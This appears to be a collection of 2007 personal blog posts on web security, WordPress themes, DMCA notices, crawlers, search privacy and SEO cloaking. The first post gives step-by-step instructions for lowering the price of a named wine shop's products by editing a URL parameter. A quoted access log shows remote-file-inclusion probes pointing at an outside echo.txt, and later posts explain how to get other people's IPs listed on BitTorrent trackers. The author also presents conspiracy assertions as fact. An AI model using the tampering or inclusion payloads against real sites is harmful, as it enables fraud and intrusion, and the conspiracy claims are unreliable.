1. Visit their site, http://www.weingut-martin.de/
2. Find something you want to order.
3. Look at the link to Kaufen (buy): (link cut here to avoid very long line):
   http://www.weingut-martin.de/warenkorb.php?cmd=new \
   &bestell=2612 \
   &name=Homburger%20Kallmuth%20Silvaner%20Kabinett%20halbtrocken \
   &preis=4.80&tip=boxbeutel
4. Notice how preis (price) is part of this link. Don’t just click Kaufen to buy, copy the url and change the &preis variable to something like 0.50 and paste that link into your browser…
5. Cheap wine!

Now, I’m not saying you should actually go ahead and do this and finalize the order (which actually works). I’m just saying that that is a great security design right there. really thought-through.

Hitlog evidence

Hitlog story regarding the Pakihackers Corp. is this:

 220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] “GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 8269 “-” “libwww-perl/5.808″
220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] “GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 22871 “-” “libwww-perl/5.808″
220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] “GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 8206 “-” “libwww-perl/5.808″

Bad for your server

Everything indicates that Pakihackers are very bad for you and your server(s).

130.232.220.in-addr.arpa. 10800 IN      SOA     ns1.pacific.net.hk. postmaster.pacific.net.hk

It really did not make me shocked to learn that Pakihackers are .hk based. It does look like they are doing automatic checks for some kind of WP/WPMU exploit of somekind.

Pakihackers scanning is not dangerous if you are using recient versions of WPMU (v.1.2.3 / v1.2.4). But it’s kind of annoying, because they keep on hammering these lame requires all day long. Perhaps pakihackers are bad for you if you’re using some ancient WP version, who knows.

The concept is frequently mentioned both in shadowy secret meetings with corporate leadership and members from the intelligence community. It is also sometimes mentioned on IRC in relation to “xiando”.

04:40 -!- Irssi: Join to #tor was synced in 8 secs
04:44 < arma> good point. do feel free to fix it
05:15 < Armedblowfish> Is xiando an operator on this channel?
05:15 < arma> not that i know of
05:15 < Armedblowfish> Then how would he/she fix it?
05:16 < coderman> social engineering
05:16 < croup> rubber hoses
05:16 < coderman> weasel can be presuaded… with a little effort or hard cash…

Xiando SIGiNT has picked up a lot of chatter about IPv6 support being added to Tor on #tor at oftc. It is strongly indicated that Tor will be able to connect to IPv6-only websites in the very near future. This means that Tor-users will be able to enjoy the world of IPv6 services securely without actually having IPv6 themselves.

This may not sound like breaking news, but oh it is, it’s very good news indeed. IPv6 has already become the dominant standard in civilized parts of the world such as Japan, and some of the sites in these countries are only available to IPv6 users. Foregin devils Tor-users who only have IPv4 may be able to experience these sites in the close future - if the chatter picked up by xiando SIGiNT is close to correct.

Why, what’s wrong with 90% of the WordPress themes out there?

A whole lot. Including..

Spamthemes.

The most annoying thing is that most themes are made by people doing “Search Engine Optimization” in the forbidden way: They make a theme, place links to their own site and “sponsors” on it, and hope that these links - when placed on various websites - generate enough backlinks to give themselves and their sponsors high rankings in search-engines.

This, like all other black hat SEO, doesn’t work in the long run. Google and Technorati, for example, will just nuke you for not following their webmaster guidelines (and general politeness) if you do “template-linkspamming”, but nobody seems to care.

There are (at least) two things wrong with every spamtheme:

• They are just some other theme which is slightly modified (duplicate)
• They claim to be “widget”-ready while they in reality are not, the typical problem being that the “Meta” section in the sidebar is excluded from the if dynamic_sidebar.. endif; (in order to get the linkspam shown to widget-users)
• The header, and sometimes other theme files are full og spam links (hey, what’s up with placing SEO-type links in comments.php? Hope people don’t notice, eh?

It’s also interesting to note that most spamthemes are released under the “Creative Commons Attribution Non Commercial ShareAlike” license, and the extra term is mostly “You can’t remove the links”, which pretty much rules out using most of these themes - unless you choose to (safely) ignore the “terms”. The reason you can ignore these terms is that many themes are GNU GPL licensed. Yes, there are spamtheme authors who release under GNU GPL and claim you can’t remove their spam-links, too, and these “designers” really should read it - because you can remove any spam-links under the GNU GPL (yeah, you have to point out who originally made the theme, but it is enough to inform that in a file called “readme.txt” in a re-released .zip file). The reason this mostly applies to the “Attribution Non Commercial ShareAlike”-licensed themes too is that most of these themes are actually based on Kubrick or some other GPL-licensed theme. This means that “Attribution Non Commercial ShareAlike” re-releases are void by default…

But it is equally annoying that..

Most WordPress themes require you to edit them

WordPress and WPMU have a nice editor, a feature rich interface and is generally user-friendly. So why do most theme designers expect the users to hand-edit the theme-files? Close to none of the WP themes available today work out of the box. The themes designed purely for linkspamming, as mentioned above, obviously require editing away the links “when allowed”, but that’s just the start.

Some themes, like Tukulr by Nurudin Jauhari, have this cute little “About me” box all worked up with some default text in functions.php and some nice graphics. This obviously requires the user to edit the text in the themes php files before using it. And the text being in functions.php and not sidebar.php makes it kind of hard to find. It must be noted that the profile page, which can be edited from within WP, has such a field - which can be called with the_author_description() (or get_the_author_description(), if you want to use it in a variable) and thus; there is absolutely no need to require the user to edit the theme file for showing “about me”..

Editing theme files is just fine if you’re not afraid to open a PHP file, but if you barely know how to install it.. this is very bad and really should be avoided. And most people are not theme designers,or PHP programmers, and don’t know how to edit php files.

I really do think that more WP theme designers should make sure the theme works right out of the box without editing any of the themes files.

And then there is the big problem of..

Many WordPress themes are actually broken in WP 2.1/WPMU 1.2.x.

This may not be entirely all theme designers fault, but fact of the matter is that many themes, like Spiffy, use things like:

$link_cats = $wpdb->get_results(”SELECT cat_id, cat_name FROM $wpdb->linkcategories”);

to print out the categories - this may have worked, but it doesn’t work with the latest version of WP/WPMU. It’s interesting that the comments field in that theme suggusts using:

$link_cats = $wpdb->get_results(”SELECT cat_id, cat_name FROM $wpdb->categories WHERE link_count > ‘0′”);

instead, however: What’s so wrong with wp_list_categories()? It’s got plenty of advanced options and there really isn’t any good reason to call the database to list the categories - or do anything else for that matter.. WP can take care of it!

..and the annyoing lack of advanced WP features

WP now allows the user to change theme top picture from within WP - if the theme supports it. I’ve slightly modified dozens of themes to support this - it’s a shame that close to zero support it by default. It’s easy to fix this in 5 minutes, but 5 minutes times 50 times become.. a lot of time. It really isn’t that much trouble for someone who maintains a theme to change it so the header-picture can be changed, and fixing this is speically easy if you already know how the CSS and PHP files of a theme work - or you have to look at them to see where/how the header pic is loaded, which steals yet a few more minutes…

And then there is the brutal fact: Most themes are ugly.

Which is the primary reason I am going to write my own theme, finally. I really want something very simple yet very pretty. This may, obviously, turn out to be something completely different from what other people find pretty, but still: As said, I have installed over 160+ themes at the free blogging service Livelyblog.com, I’ve looked at propbably more than 500+ WP themes, and none of them are really smashing.

My plan.

Just to share some basic ideas: I am going to try to make one basic theme to build on using the Template: themefolder tag which is available for WP themes. This means that I can write the php files once and then make other themes which only include style.css, images and changed core files - if any. I find it strange that nobody is using this when they release like 5 themes who look almost the same and there is no difference between their PHP files… I’d also like the theme to support all the latest WP features like widgets (not really a buildt-in feature, but it’s as good as one..) and header image changing from within WP.

“Copies of the Warner Brothers Movie “300″ are being torrented from your server identified herein”

..said one of the letters my ISP got from Marc Brandon, Vice-President, Anti-Piracy Internet Operations, Warner Bros. Entertainment Inc a few weeks ago. The problem with their story is that the movie 300 was not being torrented from the server in question, the references file had never been on the server, and I had never even heard of the movie “300″ until I got this notice.

And more spam with claims of “Copyright violation” of other movies and TV-shows I’d never heard of - nor had on my server - ticked in at my ISP the following weeks.

How BitTorrent works

BitTorrent works like this: You download a torrent file which contains a HASH for a file and a tracker IP and port. Your BitTorrent then connects to the tracker, gets a list of other peers and then connects to these peers to get parts of the file(s) the torrent has hashes for.

It seems clear from the supposed “copyright violation” claims that the DMCA notice spamming corporations such as Warner Bros. hire corporations who just go to trackers, download the list of IPs listed there and then claim every IP listed on that tracker is somehow hosting a copy of their file.

However, trackers are just URL resources, just like other resources on the Internet - and look like this:

http://tpb.tracker.thepiratebay.org/announce
?info_hash=%09%15%2A%5F%90%5Bh%80%84%EA%40p%3Fh%83%27%CE%2F%8C%F4
&peer_id=CeceshdyTiWhakceof
&port=7882
&uploaded=292230758
&downloaded=0
&left=1461153792
&event=started
&numwant=100
&compact=1

If you visit that URL then you’re supposedly sharing the file, according to Anti-Piracy Internet Operations at Warner Bros. It is also interesting to note that tracker URLs can be inserted in HTML image tags (<img src=”http://tracker…/announce?…” />) on websites - which means that anyone who visits this sites (including web crawlers) gets their IP listed on the tracker - without sharing - or even having heard of - the file the trackers tracking.

But why are they spamming me?

Why are they spamming me with DMCA notices about files I’m not distributing and never heard of? Short answer: I don’t know.

Maby they just don’t like that I run The TorrentChannel, a legal BitTorrent site which documents Warner Bros. involvement with mass murderer and crimes against humanity and therefore make up that IPs used to seed legal torrents who are available at that site are somehow being used to distribute torrents who are not distributed from that site’s seed servers. They can’t just tell my ISP “This website presents information which goes against our propaganda, please shut it down”, but they can claim “copyright violation” of some random file.

It may also be that they actually visited a load of trackers, pulled down their list of IPs and spammed everyone listed in the trackers - including my servers IPs, if they were indeed on the trackers references in the DMCA-notice spams to my ISP. This could happen for a number of reasons:

1 . Some trackers are now adding random valid IPs among the trackers list of peer IPs. This may sound like a good idea at first blush, but if my ISP is getting spammed with DMCA notices because trackers are mixing in IPs of computers used to seed legal torrents among the tracker results of copyrighted content then those doing this should realize that the movie industry just spams any IP on a tracker, which means that the effect is that random people get spam from MPAA members because of it.

2. Computers used to seed legal torrents for The TorrentChannel are also web crawling for the search engine YacySearch.com. If this web crawler goes through a bittorrent website then it’s suddenly supposedly “violating the copyright” of a whole range of Hollywood propaganda producers. This is how I got the idea on how to make the movie industry send their spam to traditional spammers.

3. I support the Tor anonymity network by running Tor-servers. This helps people in tyrannical regimes like Norway and China use the Internet without fear of being tortured by their government for reading the wrong thing. It is possible to exit from the Tor-network and scrape a tracker. It is also possible to exit to BitTorrent clients from some Tor-servers - and this is covered by DMCA safe harbor. However, Tor exits can set their own exit policy. I want to support people who want to browse the web without fear of being tortured, but don’t see the point in supporting BitTorrent over Tor - so I block the typical BitTorrent ports at my exits. This means that if someone exited from my Tor exit to a tracker then that would be the only thing they were doing from my exit. It is not be possible to connect to other BitTorrent peers using the my exits, and nobody would be able to connect to the user who exited to a tracker through my exit-node.

So in summary: The only one of the above possible reasons for the numerous spam messages my ISP have recieved over the last few weeks about “DMCA Copyright Violation” which could even remotely have something to do with my servers would be that someone exited from the Tor-network and scraped a tracker.

Someone exiting from the Tor-network to scrape a BitTorrent tracker is not even remotely the same as “distributing content” - and that’s only one of the many possible reasons why the movie industry are spamming my ISP.

None of the claimed “pirated” files mentioned in movie industry spam my ISP has recieved the last few weeks were ever on my server. I had actually never even heard of the movie “300″ or HBO’s TV-show “Rome” before I got “copyright violation” spam which said I was “distributing” that content.

This clearly shows that the movie industry have no idea if those they send “copyrigth violation” spam to are actually distributing their content, and it seems perfectly clear that they don’t try to connect to any of the IPs they claim are distributing their content to see if they are actually running a BitTorrent client which is seeding the file in question, and so on. I use the term spam here because that’s how I view these claims now: It’s redicilous how many I’ve gotten the last two weeks and again: NONE of these claims were valid.

Now for the “gold”:

How to make DMCA notice spammers spam traditional spammers

A web crawler is a program which crawls the web and indexes websites content. Most crawlers are run by search-engines in order to make interesting pages appear among their search-results. The first thing a legitimate web crawler does when it visits a site is to download a copy of the Robots Exclution Standard instruction file robots.txt.

There are also quite a few web crawlers who are run by spammers. These crawlers look e-mail addresses listed in web pages and produce a list which is later used to mass-mail junk like viagra advertisements. Such crawlers generally do not obey robots.txt, most of them don’t even read it.

The trick that can be used to expose such crawlers is to make a hidden link to /trap/ in a web page and deny /trap/ in robots.txt. Human visitors don’t see the link and well-behaved web crawlers ignore the link because it’s disallowed. Nothing but misbehaved web crawlers, most of which are used by spammers, will attempt to access your /trap/.

What you should put inside /trap/ is a plain .html file with a bunch of links to popular BitTorrent tracker’s announce.php? URLs. This will make spam-harvesting web-crawlers visit your /trap/, find learn the links and then add themselves to various BitTorrent trackers when they attempt to harvest e-mail addresses using those links. “Piracy”-hunters for the movie industry will then see the spam-harvesting crawlers as BitTorrent users and then pass their IPs on to the movie industry’s various law firms - who will then spam the spammers with DMCA “copyright violation” notices!

One last thing…

Just a little note on piracy: Television shows like 24 are pure propaganda designed to promote the lie that the completely fake “war on terror” is real, that “Al-Qaida” is more than a myth and that torture is alright. Most Hollywood-produced movies and TV-shows are nothing but fascist propaganda. If you download copyrighted material produced by the mostly complicit-in-mass-murderer and highly criminal movie industry then you are indirectly supporting it. They can say “Oh, look, people are pirating our shows!” and claim that is why they spam those legally distributing content which goes against everything they would have people believe.

If everybody, including you, would just boycott the church of Hollywood and nobody viewed or downloaded their propaganda then they’d have to admit that their distribution model is a farse and that their lack of paying customers is due to their own stupidity. Suing the person who made it possible for me to view DVDs I bought and paid for on my own Linux-based computer?? DRM “protected” content, which you can’t even use on Linux?? Come on! The movie and music industries have loosing customers because they made it so hard to legally buy and use their products that it doesn’t seem to be worth it even if you really want to purchase their products, not because people are foolishly helping them spread their propaganda on the Internet using P2P software such as BitTorrent.. “Piracy” does provide a way to explain away their own mistakes, reasons to force new tyrannical laws upon the people and it even serves as a means to claim a higher number of viewers when negotiating “product placement” deals. Be aware that you are supporting the evil movie industry if you pirate their crappy propaganda content, even though the industry itself don’t realize - or won’t admit - that this is the case. Also, as explained above: If you’re supporting the movie industry then you’re supporting spammers.

Sphere Scout visited my blog, fetched robots.txt to check for permission to crawl and then and grabbed 9 pages in 16 seconds - and that was it.

64.40.115.32 - - [23/Mar/2007:02:42:05 -0400] “GET /robots.txt HTTP/1.0″ 200 24 “-” “Sphere Scout&v4.0 (beta) - scout at sphere dot com”
64.40.115.32 - - [23/Mar/2007:02:42:06 -0400] “GET / HTTP/1.0″ 200 34940 “-” “Sphere Scout&v4.0 (beta) - scout at sphere dot com”
64.40.115.32 - - [23/Mar/2007:02:42:09 -0400] “GET /2007/01/12/are-you-sure-your-backup-routines-are-sufficient/ HTTP/1.0″ 200 15576 “-” “Sphe”
64.40.115.32 - - [23/Mar/2007:02:42:12 -0400] “GET /2007/02/21/creative-seo-whos-there-google-heres-a-page-just-for-you/ HTTP/1.0″ 200 15177 “”
64.40.115.32 - - [23/Mar/2007:02:42:14 -0400] “GET /2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for/ HTTP/1.0″ 200″
64.40.115.32 - - [23/Mar/2007:02:42:17 -0400] “GET /2007/02/09/yet-another-creative-google-clone-spammed HTTP/1.0″ 200 17297 “-” “Sphere Scout”
64.40.115.32 - - [23/Mar/2007:02:42:19 -0400] “GET /2007/03/12/youd-be-shocked-and-amazed-if-you-knew-what-theyre-searching-for HTTP/1.0″ 200 “
64.40.115.32 - - [23/Mar/2007:02:42:21 -0400] “GET /2007/03/22/vigilant-a-pretty-cool-word HTTP/1.0″ 200 12409 “-” “Sphere Scout&v4.0 (beta) -”
64.40.115.32 - - [23/Mar/2007:02:42:23 -0400] “GET /2006/10/11/the-enormous-power-of-plain-text-e-mail-security/ HTTP/1.0″ 200 14138 “-” “Sphe”
64.40.115.32 - - [23/Mar/2007:02:42:25 -0400] “GET /2007/03/22/vigilant-a-pretty-cool-word/ HTTP/1.0″ 200 12409 “-” “Sphere Scout&v4.0 (beta) “

There is nothing wrong with crawling the web. Every search-engine has to. I started using Google as my #1 search engine many years ago, and I still do for two reasons:

1. I always find exactly what I’m looking for (this may have something do to with me knowing how to use it’s more advanced functions)
2. It’s fast. Result 1-10 of 3830000 in 0.05 seconds? It’s hard to make a static web page load that fast.

But some of their actions the latest years are at best very questionable, so it makes me happy to see that other search-engines are at least trying to give them competition. Like the blog-search-engine Sphere. But hammering a page every 2 seconds?

If every new & supposedly “next big thing” search-engine did that then it’d kill the web and that would be the end of it. That’s probably an overstatement, but still: Most web crawlers don’t rush. They download a page, wait a while, and then download another page. They usually take their time. This prevents a single bot, or a handfull of bots who happen to hit the same site, from putting noticable load on a webserver. But those running “Spere Scout” don’t get that, they want all content and they want it now.

What’s Sphere, anyway?

It’s a blog-search-engine. A pretty bad one at that.

Speed? Sphere is so slow it’s redicilous. It really is very hard to make a search-engine come close to Google’s speed, but Sphere is just… way too slow.

Results? I tried a search for “911 inside job” and it only managed to find 43 links. Technorati, another way too slow blog-only searchengine, has page by page by page with results for the term “911 inside job“. It doesn’t say how many, you have to click next and it requres referrer when using &start=200 etc, but from I bothered to check (without changing start=200 using a fake referrer field, which I briefly considered) it’s got thousands of results of that term. Google, as always, p0wnes them both with it’s incredible “about 40,850 for 911 inside job. (0.76 seconds)“.

They’ve also got a whole lot of “Tools” such as browser extentions and widgets who they encurage bloggers to install on their sites. I read their “sphere it, tools and tips” page and after carefull consideration for about 0.9 seconds found that their most advanced browser extention is a searchplugin which does the job Google’s related: queries do, and their widgets - who show “post-related search results” looked like a more annoying version of Google Adsense - only without payment.

I found that the “Social bookmarks” widget I use - which I plan on rewriting, btw - has Sphere in it (it has like 60 sites you can choose between) - so I’m going to check if having the button has any effect on their crawling behaviour the next few weeks. Will it visit more frequently, perhaps? If it does then I may actually remove the button and warn other people about having it since a page pr. 2 seconds is just totally unacceptiable crawler behaviour.

In bullet summary:

• Sphere really should consider increasing their bots crawl-delay from 2 seconds, and
• Their blogsearchengine is redicilous, it’s slow, it finds nothing and it wouldn’t even pass as decient back in 1998.

According to the first entry on Google’s define. vigilant it means:

argus-eyed: carefully observant or attentive; on the lookout for possible danger; “a policy of open-eyed awareness”; “the vigilant eye of the town watch”; “there was a watchful dignity in the room”; “a watchful parent with a toddler in tow”

So I guess the nice guy who told me to be that is entirely correct.

YaCy has a nice “feature” called Search Statistics. It gives you a nice list of the latest search keywords - and the hosts used to search. This makes it very easy to follow the same user’s searches for many searches in a row. It doesn’t use cookies, which makes tracking over time impossible, but that is something most search engines do.

Regardless. Only seeing even one or three searches in a row at YacySearch actually gives quite a lot of information about the person doing the search. And it also may tell you way to much, some of the strings some people search for are just.. sick. Or very strange.

I would actually prefer to turn this search-logging “feature” off and not be able to view it at all, because those few times I look at the “What are people searching for today?“-list I almost always get.. kind of upset at just how .. how do I put it.. sick? some people are. But it does give some interesting information, too, like if there has been some story in the mainstream press about some celeberty then suddenly everybody’s searching for that celeb’s name..

Anyway. Here’s a word of advice for you all about searching on the Internet:

1) Clear your cookies every time you close your browser (Firefox, and others, can be configured to do this automatically.

2) Use scrapers like Scroogle to search Yahoo (and Google).

3) Preferrably, use a anonymity system like Tor to browse the Internet.

4) Spread your searches between different search-engines. If MSN knows your last 100 searches then they probably know a whole lot about you. You’re better off doing 1 search at MSN, one search at Google, one search at Yahoo, and so on. This means that none of them get a complete history of your searches, and it’s way simpler to see what you’re up to when you’ve got 10 search-requests in a row or something like that…

5) Some browsers can give you “suggusted keywords” when you type in the search-box. Turn this off. It reports everything you type in the box back to a search-engine, even if you don’t actually search for anything. Worst case: You accidentially mispaste your computer password into the box, now it’s broadcasted accross the Internet to a search-engine…

Happy searching. 

After pretending to be Google a few days I’ve noticed something. Many websites seem to give a different page depending on who visits. For example, this is the front page at www.bluecoat.com:

Doesn’t look very fancy, does it? That is because they serve Google (and anyone/thing who pretends to be Google) a completely different page.

Their website actually looks like this - in most browsers:

This is what’s called doing black-hat “search engine optimization”.

Except for one little detail. The problem with all kinds of “dirty trick” black-hat SEO is that it doesn’t work.

And it specially doesn’t work with Google. Se, here’s a little dirty secret about GoogleBot: It sometimes lies about who’s there! It will fetch the / using the normal User-Agent, wait a while, and re-crawl the root page / using a (outdated beta-version of a Linux-only) web browser string.

I don’t actually know what Google (or more correctly, their bot..) thinks of websites who give them a different page. But I do not think their bot likes that kind of SEO. And as mentioned, it’s not like you’re fooling anyone by trying to give search-engines a different page, most of them now check at least 1 page on your site using a “fake” (as in not their own) User-Agent string.

But I actually like getting a simpler “SEO” page. It’s much simpler to find what you’re looking for using a “Web 0.1″ plain text link-list - in most cases…

Just one more little detail regarding SEO: It does not work. Forget about the SE part. Just optimize your sites for human visitors. If they like it then real people who like your site will link to your site and pages on your site, and that’s the only kind of SEO which actuall works. Period.